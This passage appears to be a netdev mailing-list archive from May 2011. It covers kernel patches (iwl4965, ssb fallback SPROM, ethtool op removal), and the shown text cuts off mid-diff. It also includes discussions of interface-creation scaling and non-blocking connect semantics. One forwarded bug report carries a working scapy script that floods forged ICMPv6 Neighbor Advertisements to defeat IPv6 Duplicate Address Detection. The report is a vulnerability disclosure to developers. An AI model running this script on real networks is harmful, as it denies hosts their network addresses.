> 			  Type 136 (Neighbor Advertisement)
> 			  Target: fe80::200:edff:feXX:XXXX
> 			ICMPv6 Option
> 			  Type 2 (Target link-layer address) Victim MAC
> 
> Please find attached a drawing and a proof of concept.
> 
> [3.] Keywords (i.e., modules, networking, kernel):
> 
> Network, IPv6, Duplicate Address Detection
> 
> [4.] Kernel version (from /proc/version):
> 
> Latest tested:
> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC
> 2010
> (and before most probably)
> 
> [6.] A small shell script or example program which triggers the
>        problem (if possible)
> 
> Please find attached a python script demonstrating the problem.
> 
> [X.] Other notes, patches, fixes, workarounds:
> 
> The Linux Kernel should not accept incoming Ethernet packets originating
> from an internal Ethernet card (identified by the MAC address)
> 

I fail to understand the problem.

The attacker might use any kind of source MAC address to fool 'Victim'
or 'network admins'

Why one particular address should be avoided ?




^ permalink raw reply

* Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Jan Ceuleers @ 2011-05-07 12:55 UTC (permalink / raw)
  To: netdev; +Cc: Gervais Arthur

[-- Attachment #1: Type: text/plain, Size: 2221 bytes --]

The networking folks are on netdev

-------- Original Message --------
Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform 
ICMPv6 packets
Date: Thu, 05 May 2011 11:52:05 +0200
From: Gervais Arthur <arthur.gervais@insa-lyon.fr>
To: <linux-kernel@vger.kernel.org>
CC: <arthur.gervais@insa-lyon.fr>

[1.] One line summary of the problem:

A specially crafted Ethernet ICMPv6 packet which is not conform to the
RFC can perform a IPv6 Duplicate Address Detection Failure.

[2.] Full description of the problem/report:

If a new IPv6 node joins the local area network, the new node sends an
ICMPv6 Neighbor Solicitation packet in order to check if the
self-generated local-link IPv6 address already occupied is.

An attacker can answer to this Neighbor Solicitation packet with an
ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
able to associate the just generated IPv6 address.
-- This problem is well known and IPv6 related.

The new problem is that the attacker can modify the Ethernet Neighbor
Advertisement packets, so that they are not RFC conform and so that it
is even more difficult to detect the attacker.

If an attacker sends the following packet, duplicate address detection
fails on Linux:

Ethernet Layer: 	Victim MAC --> Victim MAC
IPv6 Layer:		fe80::200:edff:feXX:XXXX --> ff02::1
			ICMPv6
			  Type 136 (Neighbor Advertisement)
			  Target: fe80::200:edff:feXX:XXXX
			ICMPv6 Option
			  Type 2 (Target link-layer address) Victim MAC

Please find attached a drawing and a proof of concept.

[3.] Keywords (i.e., modules, networking, kernel):

Network, IPv6, Duplicate Address Detection

[4.] Kernel version (from /proc/version):

Latest tested:
Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
(Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC
2010
(and before most probably)

[6.] A small shell script or example program which triggers the
       problem (if possible)

Please find attached a python script demonstrating the problem.

[X.] Other notes, patches, fixes, workarounds:

The Linux Kernel should not accept incoming Ethernet packets originating
from an internal Ethernet card (identified by the MAC address)


[-- Attachment #2: DAD_DoS_Linux_tech.png --]
[-- Type: image/png, Size: 17435 bytes --]

[-- Attachment #3: dad-dos.py --]
[-- Type: text/x-python, Size: 998 bytes --]

#! /usr/bin/env python

import sys
from multiprocessing import Process
from scapy.all import *

def f(pkt):
        sendp(pkt, loop=1, inter=1)

def callback(pkt):
        
        if IPv6 in pkt and ICMPv6ND_NS in pkt:  
                
			src_mac=pkt.sprintf("%Ether.src%")   # Source Adresse
			src=pkt.sprintf("%IPv6.src%")   # Source Adresse
			dst=pkt.sprintf("%IPv6.dst%")   # Destination Adresse
			tgt=pkt.sprintf("%ICMPv6ND_NS.tgt%")    # Target adresse 

			if src=="::" and "ff02::1:ff" in dst:

				eth = Ether(src="00:20:ed:74:89:82",dst=src_mac)
				ip = IPv6(src=tgt,dst="ff02::1")
				icmp = ICMPv6ND_NA(tgt=tgt)
				icmpOpt = ICMPv6NDOptDstLLAddr(lladdr="00:20:ed:74:89:82")

				packet = eth/ip/icmp/icmpOpt

				p = Process(target=f, args=(packet,))
				p.start()

def main():
        conf.iface6="eth1"
        try:
                scapy.sendrecv.sniff(prn=callback,store=0)
        except KeyboardInterrupt:
                exit(0)

if __name__ == "__main__":
        main()

^ permalink raw reply

* [PATCH] [RESEND] iwl4965: drop a lone pr_err()
From: Paul Bolle @ 2011-05-07 12:31 UTC (permalink / raw)
  To: John W. Linville; +Cc: linux-wireless, netdev, linux-kernel

iwl4965_rate_control_register() prints a message at KERN_ERR level. It
looks like it's just a debugging message, so pr_err() seems to be
overdone. But none of the similar functions in drivers/net/wireless
print a message, so let's just drop it entirely.

Signed-off-by: Paul Bolle <pebolle@tiscali.nl>
---
Previously sent for (I guess) v2.6.39-rc2. Still present in v2.6.39-rc6.

 drivers/net/wireless/iwlegacy/iwl-4965-rs.c |    1 -
 1 files changed, 0 insertions(+), 1 deletions(-)

diff --git a/drivers/net/wireless/iwlegacy/iwl-4965-rs.c b/drivers/net/wireless/iwlegacy/iwl-4965-rs.c
index 31ac672..8950939 100644
--- a/drivers/net/wireless/iwlegacy/iwl-4965-rs.c
+++ b/drivers/net/wireless/iwlegacy/iwl-4965-rs.c
@@ -2860,7 +2860,6 @@ static struct rate_control_ops rs_4965_ops = {
 
 int iwl4965_rate_control_register(void)
 {
-	pr_err("Registering 4965 rate control operations\n");
 	return ieee80211_rate_control_register(&rs_4965_ops);
 }
 
-- 
1.7.4.4




^ permalink raw reply related

* [PATCH 1/5] ssb: Change fallback sprom to callback mechanism.
From: Hauke Mehrtens @ 2011-05-07 12:27 UTC (permalink / raw)
  To: ralf; +Cc: linux-mips, Hauke Mehrtens, Michael Buesch, netdev,
	Florian Fainelli
In-Reply-To: <1304771263-10937-1-git-send-email-hauke@hauke-m.de>

Some embedded devices like the Netgear WNDR3300 have two SSB based
cards without an own sprom on the pci bus. We have to provide two
different fallback sproms for these and this was not possible with the
old solution. In the bcm47xx architecture the sprom data is stored in
the nvram in the main flash storage. The architecture code will be able
to fill the sprom with the stored data based on the bus where the
device was found.

The bcm63xx code should to the same thing as before, just using the new
API.

CC: Michael Buesch <mb@bu3sch.de>
CC: netdev@vger.kernel.org
CC: Florian Fainelli <florian@openwrt.org>
Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
---
 arch/mips/bcm63xx/boards/board_bcm963xx.c |   16 ++++++++++++++--
 drivers/ssb/pci.c                         |   16 +++++++++++-----
 drivers/ssb/sprom.c                       |   26 +++++++++++++++-----------
 drivers/ssb/ssb_private.h                 |    2 +-
 include/linux/ssb/ssb.h                   |    4 +++-
 5 files changed, 44 insertions(+), 20 deletions(-)

diff --git a/arch/mips/bcm63xx/boards/board_bcm963xx.c b/arch/mips/bcm63xx/boards/board_bcm963xx.c
index 8dba8cf..40b223b 100644
--- a/arch/mips/bcm63xx/boards/board_bcm963xx.c
+++ b/arch/mips/bcm63xx/boards/board_bcm963xx.c
@@ -643,6 +643,17 @@ static struct ssb_sprom bcm63xx_sprom = {
 	.boardflags_lo		= 0x2848,
 	.boardflags_hi		= 0x0000,
 };
+
+int bcm63xx_get_fallback_sprom(struct ssb_bus *bus, struct ssb_sprom *out)
+{
+	if (bus->bustype == SSB_BUSTYPE_PCI) {
+		memcpy(out, &bcm63xx_sprom, sizeof(struct ssb_sprom));
+		return 0;
+	} else {
+		printk(KERN_ERR PFX "unable to fill SPROM for given bustype.\n");
+		return -EINVAL;
+	}
+}
 #endif
 
 /*
@@ -793,8 +804,9 @@ void __init board_prom_init(void)
 	if (!board_get_mac_address(bcm63xx_sprom.il0mac)) {
 		memcpy(bcm63xx_sprom.et0mac, bcm63xx_sprom.il0mac, ETH_ALEN);
 		memcpy(bcm63xx_sprom.et1mac, bcm63xx_sprom.il0mac, ETH_ALEN);
-		if (ssb_arch_set_fallback_sprom(&bcm63xx_sprom) < 0)
-			printk(KERN_ERR "failed to register fallback SPROM\n");
+		if (ssb_arch_register_fallback_sprom(
+				&bcm63xx_get_fallback_sprom) < 0)
+			printk(KERN_ERR PFX "failed to register fallback SPROM\n");
 	}
 #endif
 }
diff --git a/drivers/ssb/pci.c b/drivers/ssb/pci.c
index 6f34963..34955d1 100644
--- a/drivers/ssb/pci.c
+++ b/drivers/ssb/pci.c
@@ -662,7 +662,6 @@ static int sprom_extract(struct ssb_bus *bus, struct ssb_sprom *out,
 static int ssb_pci_sprom_get(struct ssb_bus *bus,
 			     struct ssb_sprom *sprom)
 {
-	const struct ssb_sprom *fallback;
 	int err;
 	u16 *buf;
 
@@ -707,10 +706,17 @@ static int ssb_pci_sprom_get(struct ssb_bus *bus,
 		if (err) {
 			/* All CRC attempts failed.
 			 * Maybe there is no SPROM on the device?
-			 * If we have a fallback, use that. */
-			fallback = ssb_get_fallback_sprom();
-			if (fallback) {
-				memcpy(sprom, fallback, sizeof(*sprom));
+			 * Now we ask the arch code if there is some sprom
+			 * avaliable for this device in some other storage */
+			err = ssb_fill_sprom_with_fallback(bus, sprom);
+			if (err) {
+				ssb_printk(KERN_WARNING PFX "WARNING: Using"
+					   " fallback SPROM failed (err %d)\n",
+					   err);
+			} else {
+				ssb_dprintk(KERN_DEBUG PFX "Using SPROM"
+					    " revision %d provided by"
+					    " platform.\n", sprom->revision);
 				err = 0;
 				goto out_free;
 			}
diff --git a/drivers/ssb/sprom.c b/drivers/ssb/sprom.c
index 5f34d7a..20cd139 100644
--- a/drivers/ssb/sprom.c
+++ b/drivers/ssb/sprom.c
@@ -17,7 +17,7 @@
 #include <linux/slab.h>
 
 
-static const struct ssb_sprom *fallback_sprom;
+static int(*get_fallback_sprom)(struct ssb_bus *dev, struct ssb_sprom *out);
 
 
 static int sprom2hex(const u16 *sprom, char *buf, size_t buf_len,
@@ -145,13 +145,14 @@ out:
 }
 
 /**
- * ssb_arch_set_fallback_sprom - Set a fallback SPROM for use if no SPROM is found.
+ * ssb_arch_register_fallback_sprom - Registers a method providing a fallback
+ * SPROM if no SPROM is found.
  *
- * @sprom: The SPROM data structure to register.
+ * @sprom_callback: The callbcak function.
  *
- * With this function the architecture implementation may register a fallback
- * SPROM data structure. The fallback is only used for PCI based SSB devices,
- * where no valid SPROM can be found in the shadow registers.
+ * With this function the architecture implementation may register a callback
+ * handler which wills the SPROM data structure. The fallback is only used for
+ * PCI based SSB devices, where no valid SPROM can be found in the shadow registers.
  *
  * This function is useful for weird architectures that have a half-assed SSB device
  * hardwired to their PCI bus.
@@ -163,18 +164,21 @@ out:
  *
  * This function is available for architecture code, only. So it is not exported.
  */
-int ssb_arch_set_fallback_sprom(const struct ssb_sprom *sprom)
+int ssb_arch_register_fallback_sprom(int (*sprom_callback)(struct ssb_bus *bus, struct ssb_sprom *out))
 {
-	if (fallback_sprom)
+	if (get_fallback_sprom)
 		return -EEXIST;
-	fallback_sprom = sprom;
+	get_fallback_sprom = sprom_callback;
 
 	return 0;
 }
 
-const struct ssb_sprom *ssb_get_fallback_sprom(void)
+int ssb_fill_sprom_with_fallback(struct ssb_bus *bus, struct ssb_sprom *out)
 {
-	return fallback_sprom;
+	if (!get_fallback_sprom)
+		return -ENOENT;
+
+	return get_fallback_sprom(bus, out);
 }
 
 /* http://bcm-v4.sipsolutions.net/802.11/IsSpromAvailable */
diff --git a/drivers/ssb/ssb_private.h b/drivers/ssb/ssb_private.h
index 0331139..1a32f58 100644
--- a/drivers/ssb/ssb_private.h
+++ b/drivers/ssb/ssb_private.h
@@ -171,7 +171,7 @@ ssize_t ssb_attr_sprom_store(struct ssb_bus *bus,
 			     const char *buf, size_t count,
 			     int (*sprom_check_crc)(const u16 *sprom, size_t size),
 			     int (*sprom_write)(struct ssb_bus *bus, const u16 *sprom));
-extern const struct ssb_sprom *ssb_get_fallback_sprom(void);
+extern int ssb_fill_sprom_with_fallback(struct ssb_bus *bus, struct ssb_sprom *out);
 
 
 /* core.c */
diff --git a/include/linux/ssb/ssb.h b/include/linux/ssb/ssb.h
index 9659eff..045f72a 100644
--- a/include/linux/ssb/ssb.h
+++ b/include/linux/ssb/ssb.h
@@ -404,7 +404,9 @@ extern bool ssb_is_sprom_available(struct ssb_bus *bus);
 
 /* Set a fallback SPROM.
  * See kdoc at the function definition for complete documentation. */
-extern int ssb_arch_set_fallback_sprom(const struct ssb_sprom *sprom);
+extern int ssb_arch_register_fallback_sprom(
+		int (*sprom_callback)(struct ssb_bus *bus,
+		struct ssb_sprom *out));
 
 /* Suspend a SSB bus.
  * Call this from the parent bus suspend routine. */
-- 
1.7.4.1

^ permalink raw reply related

* Re: Scalability of interface creation and deletion
From: Eric Dumazet @ 2011-05-07 12:22 UTC (permalink / raw)
  To: Alex Bligh; +Cc: netdev
In-Reply-To: <891B02256A0667292521A4BF@Ximines.local>

Le samedi 07 mai 2011 à 12:08 +0100, Alex Bligh a écrit :
> I am trying to track down why interface creation slows down badly with
> large numbers of interfaces (~1,000 interfaces) and why deletion is so
> slow. Use case: restarting routers needs to be fast; some failover methods
> require interface up/down; some routers need lots of interfaces.
> 
> I have written a small shell script to create and delete a number of
> interfaces supplied on the command line (script appended below). It
> is important to run this with udev, udev-bridge etc. disabled. In
> my environment
> (Ubuntu 2.6.32-28-generic, Lucid). I did this by
>  * service upstart-udev-bridge stop
>  * service udev stop
>  * unshare -n bash
> If you don't do this, you are simply timing your distro's interface
> scripts.
> 
> Note the "-n" parameter creates the supplied number of veth pair
> interfaces. As these are pairs, there are twice as many interfaces actually
> created.
> 
> So, the results which are pretty repeatable are as follows:
> 
>                             100 pairs      500 pairs
> Interface creation               14ms          110ms
> Interface deletion              160ms          148ms
> 
> Now I don't think interface deletion has in fact got faster: simply
> the overhead of loading the script is spread over more processes.
> But there are two obvious conclusions:
> 
> 1. Interface creation slows down hugely with more interfaces

sysfs is the problem, a very well known one.
(sysfs_refresh_inode(), 

try :

$ time ls /sys/class/net >/dev/null

real	0m0.002s
user	0m0.000s
sys	0m0.001s
$ modprobe dummy numdummies=1000
$ time ls /sys/class/net >/dev/null

real	0m0.041s
user	0m0.003s
sys	0m0.002s


> 2. Interface deletion is normally much slower than interface creation
> 
> strace -T -ttt on the "ip" command used to do this does not show the delay
> where I thought it would be - cataloguing the existing interfaces. Instead,
> it's the final send() to the netlink socket which does the relevant action
> which appears to be slow, for both addition and detion. Adding the last
> interface takes 200ms in that syscall, the first is quick (symptomatic of a
> slowdown); for deletion the last send syscall is quick.
> 
> Poking about in net/core/dev.c, I see that interface names are hashed using
> a hash with a maximum of 256 entries. However, these seem to be hash
> buckets supporting multiple entries so I can't imagine a chain of 4 entries
> is problematic.

Its not.

> 
> I am having difficulty seeing what might be the issue in interface
> creation. Any ideas?
> 

Actually a lot, just make

git log net/core/dev.c

and you'll see many commits to make this faster.

> In interface deletion, my attention is drawn to netdev_wait_allrefs,
> which does this:
>         refcnt = netdev_refcnt_read(dev);
> 

Here refcnt is 0, or there is a bug somewhere.
(It happens, we fix bugs once in a while)

>         while (refcnt != 0) {
>                 ...
>                 msleep(250);
> 
>                 refcnt = netdev_refcnt_read(dev);
> 		....
>         }
> 
> I am guessing that this is going to do the msleep 50% of the time,
> explaining 125ms of the observed time. How would people react to
> exponential backoff instead (untested):
> 
> 	int backoff = 10;
>         refcnt = netdev_refcnt_read(dev);
> 
>         while (refcnt != 0) {
>                 ...
>                 msleep(backoff);
>                 if ((backoff *= 2) > 250)
>                   backoff = 250;
> 		
>                 refcnt = netdev_refcnt_read(dev);
> 		....
>         }
> 
> 

Welcome to the club. This is what is discussed on netdev since many
years. Lot of work had been done to make it better.

Interface deletion needs several rcu synch calls, they are very
expensive. This is the price to pay to have lockless network stack in
fast paths.




^ permalink raw reply

* Re: bug in select(2) regarding non-blocking connect(2) completion?
From: Eric Dumazet @ 2011-05-07 12:12 UTC (permalink / raw)
  To: Michael Shuldman; +Cc: linux-kernel, David S. Miller, karls, netdev
In-Reply-To: <20110507105152.GA13459@jensen.inet.no>

Le samedi 07 mai 2011 à 12:51 +0200, Michael Shuldman a écrit :
> Hello, I am occasionally encountering what I belive is a bug in the
> kernel.
> 
> Below is a strace that I believe shows how the bug manifests itself,
> with my comments.
> 
> 
> # first select.  All fd's in the write set ([15 17 ... 51 55]) are 
> # non-blocking sockets that have had a connect(2) previously issued on
> # them, and which have yet to finish connecting as far as we know
> # at the time we call select(2).

We dont see the return from connect() : maybe the error was already
returned there.

Only EINPROGRESS is valid here (or fd should be closed right now)

> 03:55:31.808548 select(58, [4 8 11 12 13 14 16 18 19 20 21 22 23 24 26 27 30 31
> 32 33 34 35 36 37 39 40 41 43 44 46 48 49 50 52 53 54 57], [15 17 25 29 45 47 51
>  55], [11 12 13 14 16 18 19 20 21 22 23 24 26 27 30 31 32 33 34 35 36 37 39 40 4
> 1 43 44 46 48 49 50 52 53 54 57], {1, 0}) = 3 (in [16 26], out [51], left {1, 0}
> )
> 
> # As indicated by the results returned by the above select(2), fd 51 should
> # have finished the connect attempt, but when we try to find out whether 
> # the connect(2) succeeded or failed, the results are conflicting.
> 

If connect() attempt is rejected by remote peer, then select() says your
fd is 'writeable', in the sense you have the definitive answer to your
non blocking connect().

> 03:55:31.808622 getpeername(51, 0x7fff5d2eaa8c, [0]) = -1 ENOTCONN (Transport en
> dpoint is not connected)

This means end point is non connected : other peer sent RST or no answer
to SYN packets.


> 03:55:31.808900 getsockopt(51, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
> 

Hmm, interesting... Are you sure a previous call was not already done
(since this clears the error) ?

> # getpeername(2) failing on a socket that has finished connecting should 
> # indicate that the connect(2) failed.  Yet when we try to fetch the
> # SO_ERROR of the socket, it says no error is currently set.
> # We then loop around with select(2) again, and again the same thing
> # happens:
> 
> 03:55:31.809259 select(58, [4 8 11 12 13 14 16 18 19 20 21 22 23 24 26 27 30 31
> 32 33 34 35 36 37 39 40 41 43 44 46 48 49 50 52 53 54 57], [15 17 25 29 45 47 51
>  55], [11 12 13 14 16 18 19 20 21 22 23 24 26 27 30 31 32 33 34 35 36 37 39 40 4
> 1 43 44 46 48 49 50 52 53 54 57], {1, 0}) = 3 (in [16 26], out [51], left {1, 0}
> )
> 03:55:31.809329 getpeername(51, 0x7fff5d2eaa8c, [0]) = -1 ENOTCONN (Transport en
> dpoint is not connected)
> 03:55:31.809640 getsockopt(51, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
> 

Well, if you missed the original error report, all next getpeername()
and SO_ERROR will do the same, and select() says fd is ready for 'write'

> ...
> 
> # finally, getsockopt(2) returns that the connect(2) failed.
> 03:55:32.521146 getpeername(51, 0x7fff5d2eaa8c, [0]) = -1 ENOTCONN (Transport en
> dpoint is not connected)
> 03:55:32.521614 getsockopt(51, SOL_SOCKET, SO_ERROR, [101], [4]) = 0
> 
> In other words, select(2) says the socket has finished connecting,
> getpeername(2) neither confirms nor denies this (it can only confirm
> if the connect finished successfully).  getsockopt(2) and SO_ERROR
> however says there is no error on the socket, which coupled
> with getpeername(2) failing, indicates that the connect(2) has
> not yet finished
> 
> 
> 
> This does not happen all the time.  E.g., I watched the system for
> an hour yesterday, as things were staring up and the number of
> concurrent tcp clients gradually increased from zero to around 700,
> with no observable problems.  However after a while, the problem
> starts occurring, related to an increasing number of clients or
> something else, I do not know.
> 
> Currently the system has a little over 3,000 clients and the problem
> occurs now and then, sometimes several times a minute, while sometimes
> it can take dozens of minutes between each time.  At the moment,
> the last time the problem was detected was 40 minutes ago.
> 
> The software the above strace is related to is a proxy server, and
> if there are 3000 clients (incoming TCP sessions), there would
> normally be 3000 outgoing TCP sessions also.  
> 
> uname -a on the system in question reports 
> 2.6.18-238.9.1.el5 #1 SMP Tue Apr 12 18:10:13 EDT 2011 x86_64 x86_64
> x86_64 GNU/Linux
> 
> Thankful for any hints or pointers related to this problem.
> With kind regards,
> 

Make sure you dont miss an error in connect() system call.




^ permalink raw reply

* Re: [RFT PATCH] net: remove legacy ethtool ops
From: Jeff Kirsher @ 2011-05-07 11:58 UTC (permalink / raw)
  To: Michał Mirosław
  Cc: netdev, David S. Miller, Patrick McHardy, Ben Hutchings,
	e1000-devel
In-Reply-To: <20110507114802.A0C841389B@rere.qmqm.pl>

2011/5/7 Michał Mirosław <mirq-linux@rere.qmqm.pl>:
> As all drivers are converted, we may now remove discrete offload setting
> callback handling.
>
> Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
> ---
>
> Note: This needs to wait for Intel guys to finish conversion of their
> LAN drivers.
>
>  include/linux/ethtool.h   |   52 ------
>  include/linux/netdevice.h |   16 --
>  net/8021q/vlan_dev.c      |    2 +-
>  net/core/dev.c            |   13 +-
>  net/core/ethtool.c        |  399 +++------------------------------------------
>  5 files changed, 28 insertions(+), 454 deletions(-)
>

I do apologize for the delay, we did find several problems with the
original set of patches you submitted during review and testing.
Currently we have fixed up the e1000e, yet there is still work to be
done on the other drivers.  I will make every effort to make sure that
we complete the work over the next week.

-- 
Cheers,
Jeff

^ permalink raw reply

* [RFT PATCH] net: remove legacy ethtool ops
From: Michał Mirosław @ 2011-05-07 11:48 UTC (permalink / raw)
  To: netdev
  Cc: David S. Miller, Patrick McHardy, Ben Hutchings, Jeff Kirsher,
	e1000-devel

As all drivers are converted, we may now remove discrete offload setting
callback handling.

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---

Note: This needs to wait for Intel guys to finish conversion of their
LAN drivers.

 include/linux/ethtool.h   |   52 ------
 include/linux/netdevice.h |   16 --
 net/8021q/vlan_dev.c      |    2 +-
 net/core/dev.c            |   13 +-
 net/core/ethtool.c        |  399 +++------------------------------------------
 5 files changed, 28 insertions(+), 454 deletions(-)

diff --git a/include/linux/ethtool.h b/include/linux/ethtool.h
index 4194a20..2ef53fa 100644
--- a/include/linux/ethtool.h
+++ b/include/linux/ethtool.h
@@ -691,9 +691,6 @@ enum ethtool_sfeatures_retval_bits {
 
 #include <linux/rculist.h>
 
-/* needed by dev_disable_lro() */
-extern int __ethtool_set_flags(struct net_device *dev, u32 flags);
-
 struct ethtool_rx_ntuple_flow_spec_container {
 	struct ethtool_rx_ntuple_flow_spec fs;
 	struct list_head list;
@@ -726,18 +723,6 @@ struct net_device;
 
 /* Some generic methods drivers may use in their ethtool_ops */
 u32 ethtool_op_get_link(struct net_device *dev);
-u32 ethtool_op_get_tx_csum(struct net_device *dev);
-int ethtool_op_set_tx_csum(struct net_device *dev, u32 data);
-int ethtool_op_set_tx_hw_csum(struct net_device *dev, u32 data);
-int ethtool_op_set_tx_ipv6_csum(struct net_device *dev, u32 data);
-u32 ethtool_op_get_sg(struct net_device *dev);
-int ethtool_op_set_sg(struct net_device *dev, u32 data);
-u32 ethtool_op_get_tso(struct net_device *dev);
-int ethtool_op_set_tso(struct net_device *dev, u32 data);
-u32 ethtool_op_get_ufo(struct net_device *dev);
-int ethtool_op_set_ufo(struct net_device *dev, u32 data);
-u32 ethtool_op_get_flags(struct net_device *dev);
-int ethtool_op_set_flags(struct net_device *dev, u32 data, u32 supported);
 void ethtool_ntuple_flush(struct net_device *dev);
 bool ethtool_invalid_flags(struct net_device *dev, u32 data, u32 supported);
 
@@ -784,22 +769,6 @@ bool ethtool_invalid_flags(struct net_device *dev, u32 data, u32 supported);
  * @get_pauseparam: Report pause parameters
  * @set_pauseparam: Set pause parameters.  Returns a negative error code
  *	or zero.
- * @get_rx_csum: Deprecated in favour of the netdev feature %NETIF_F_RXCSUM.
- *	Report whether receive checksums are turned on or off.
- * @set_rx_csum: Deprecated in favour of generic netdev features.  Turn
- *	receive checksum on or off.  Returns a negative error code or zero.
- * @get_tx_csum: Deprecated as redundant. Report whether transmit checksums
- *	are turned on or off.
- * @set_tx_csum: Deprecated in favour of generic netdev features.  Turn
- *	transmit checksums on or off.  Returns a egative error code or zero.
- * @get_sg: Deprecated as redundant.  Report whether scatter-gather is
- *	enabled.  
- * @set_sg: Deprecated in favour of generic netdev features.  Turn
- *	scatter-gather on or off. Returns a negative error code or zero.
- * @get_tso: Deprecated as redundant.  Report whether TCP segmentation
- *	offload is enabled.
- * @set_tso: Deprecated in favour of generic netdev features.  Turn TCP
- *	segmentation offload on or off.  Returns a negative error code or zero.
  * @self_test: Run specified self-tests
  * @get_strings: Return a set of strings that describe the requested objects
  * @set_phys_id: Identify the physical devices, e.g. by flashing an LED
@@ -827,15 +796,6 @@ bool ethtool_invalid_flags(struct net_device *dev, u32 data, u32 supported);
  *	negative error code or zero.
  * @complete: Function to be called after any other operation except
  *	@begin.  Will be called even if the other operation failed.
- * @get_ufo: Deprecated as redundant.  Report whether UDP fragmentation
- *	offload is enabled.
- * @set_ufo: Deprecated in favour of generic netdev features.  Turn UDP
- *	fragmentation offload on or off.  Returns a negative error code or zero.
- * @get_flags: Deprecated as redundant.  Report features included in
- *	&enum ethtool_flags that are enabled.  
- * @set_flags: Deprecated in favour of generic netdev features.  Turn
- *	features included in &enum ethtool_flags on or off.  Returns a
- *	negative error code or zero.
  * @get_priv_flags: Report driver-specific feature flags.
  * @set_priv_flags: Set driver-specific feature flags.  Returns a negative
  *	error code or zero.
@@ -897,14 +857,6 @@ struct ethtool_ops {
 				  struct ethtool_pauseparam*);
 	int	(*set_pauseparam)(struct net_device *,
 				  struct ethtool_pauseparam*);
-	u32	(*get_rx_csum)(struct net_device *);
-	int	(*set_rx_csum)(struct net_device *, u32);
-	u32	(*get_tx_csum)(struct net_device *);
-	int	(*set_tx_csum)(struct net_device *, u32);
-	u32	(*get_sg)(struct net_device *);
-	int	(*set_sg)(struct net_device *, u32);
-	u32	(*get_tso)(struct net_device *);
-	int	(*set_tso)(struct net_device *, u32);
 	void	(*self_test)(struct net_device *, struct ethtool_test *, u64 *);
 	void	(*get_strings)(struct net_device *, u32 stringset, u8 *);
 	int	(*set_phys_id)(struct net_device *, enum ethtool_phys_id_state);
@@ -913,10 +865,6 @@ struct ethtool_ops {
 				     struct ethtool_stats *, u64 *);
 	int	(*begin)(struct net_device *);
 	void	(*complete)(struct net_device *);
-	u32	(*get_ufo)(struct net_device *);
-	int	(*set_ufo)(struct net_device *, u32);
-	u32	(*get_flags)(struct net_device *);
-	int	(*set_flags)(struct net_device *, u32);
 	u32	(*get_priv_flags)(struct net_device *);
 	int	(*set_priv_flags)(struct net_device *, u32);
 	int	(*get_sset_count)(struct net_device *, int);
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index d5de66a..7be3ca2 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -2600,22 +2600,6 @@ extern struct pernet_operations __net_initdata loopback_net_ops;
 int dev_ethtool_get_settings(struct net_device *dev,
 			     struct ethtool_cmd *cmd);
 
-static inline u32 dev_ethtool_get_rx_csum(struct net_device *dev)
-{
-	if (dev->features & NETIF_F_RXCSUM)
-		return 1;
-	if (!dev->ethtool_ops || !dev->ethtool_ops->get_rx_csum)
-		return 0;
-	return dev->ethtool_ops->get_rx_csum(dev);
-}
-
-static inline u32 dev_ethtool_get_flags(struct net_device *dev)
-{
-	if (!dev->ethtool_ops || !dev->ethtool_ops->get_flags)
-		return 0;
-	return dev->ethtool_ops->get_flags(dev);
-}
-
 /* Logging, debugging and troubleshooting/diagnostic helpers. */
 
 /* netdev_printk helpers, similar to dev_printk */
diff --git a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c
index 526159a..df66715 100644
--- a/net/8021q/vlan_dev.c
+++ b/net/8021q/vlan_dev.c
@@ -592,7 +592,7 @@ static u32 vlan_dev_fix_features(struct net_device *dev, u32 features)
 
 	features &= real_dev->features;
 	features &= real_dev->vlan_features;
-	if (dev_ethtool_get_rx_csum(real_dev))
+	if (real_dev->features & NETIF_F_RXCSUM)
 		features |= NETIF_F_RXCSUM;
 	features |= NETIF_F_LLTX;
 
diff --git a/net/core/dev.c b/net/core/dev.c
index 44ef8f8..7193499 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -1304,19 +1304,12 @@ EXPORT_SYMBOL(dev_close);
  */
 void dev_disable_lro(struct net_device *dev)
 {
-	u32 flags;
+	dev->wanted_features &= ~NETIF_F_LRO;
+	netdev_update_features(dev);
 
-	if (dev->ethtool_ops && dev->ethtool_ops->get_flags)
-		flags = dev->ethtool_ops->get_flags(dev);
-	else
-		flags = ethtool_op_get_flags(dev);
-
-	if (!(flags & ETH_FLAG_LRO))
-		return;
-
-	__ethtool_set_flags(dev, flags & ~ETH_FLAG_LRO);
 	if (unlikely(dev->features & NETIF_F_LRO))
 		netdev_WARN(dev, "failed to disable LRO!\n");
+
 }
 EXPORT_SYMBOL(dev_disable_lro);
 
diff --git a/net/core/ethtool.c b/net/core/ethtool.c
index d8b1a8d..34f32b0 100644
--- a/net/core/ethtool.c
+++ b/net/core/ethtool.c
@@ -36,139 +36,6 @@ u32 ethtool_op_get_link(struct net_device *dev)
 }
 EXPORT_SYMBOL(ethtool_op_get_link);
 
-u32 ethtool_op_get_tx_csum(struct net_device *dev)
-{
-	return (dev->features & NETIF_F_ALL_CSUM) != 0;
-}
-EXPORT_SYMBOL(ethtool_op_get_tx_csum);
-
-int ethtool_op_set_tx_csum(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_IP_CSUM;
-	else
-		dev->features &= ~NETIF_F_IP_CSUM;
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_tx_csum);
-
-int ethtool_op_set_tx_hw_csum(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_HW_CSUM;
-	else
-		dev->features &= ~NETIF_F_HW_CSUM;
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_tx_hw_csum);
-
